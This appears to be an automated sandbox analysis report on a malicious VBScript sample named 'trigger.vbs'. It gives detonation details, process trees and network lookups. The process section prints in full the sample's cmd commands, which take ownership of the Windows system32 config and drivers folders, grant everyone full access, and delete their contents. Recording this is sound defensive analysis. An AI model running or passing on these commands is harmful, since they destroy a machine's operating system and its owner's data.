Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-z5p2nayhrj
Target trigger.vbs
SHA256 22ddb640309560907cba8c9dc61f15929a88952043411cb95a707fd44a238282
Tags discovery exploit
Score 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

22ddb640309560907cba8c9dc61f15929a88952043411cb95a707fd44a238282

Threat Level: Likely malicious

The file trigger.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:18

Reported

2024-08-15 21:20

Platform

win10v2004-20240802-en

Max time kernel

124s

Max time network

132s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:18

Reported

2024-08-15 21:20

Platform

win11-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

Signatures

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 1720 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5032 wrote to memory of 1720 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5032 wrote to memory of 3744 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5032 wrote to memory of 3744 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1720 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1720 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3744 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3744 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1720 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3744 wrote to memory of 920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3744 wrote to memory of 920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3476 wrote to memory of 1768 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3476 wrote to memory of 1768 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3476 wrote to memory of 2424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3476 wrote to memory of 2424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1768 wrote to memory of 3772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1768 wrote to memory of 3772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2424 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2424 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2424 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2424 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1768 wrote to memory of 652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1768 wrote to memory of 652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A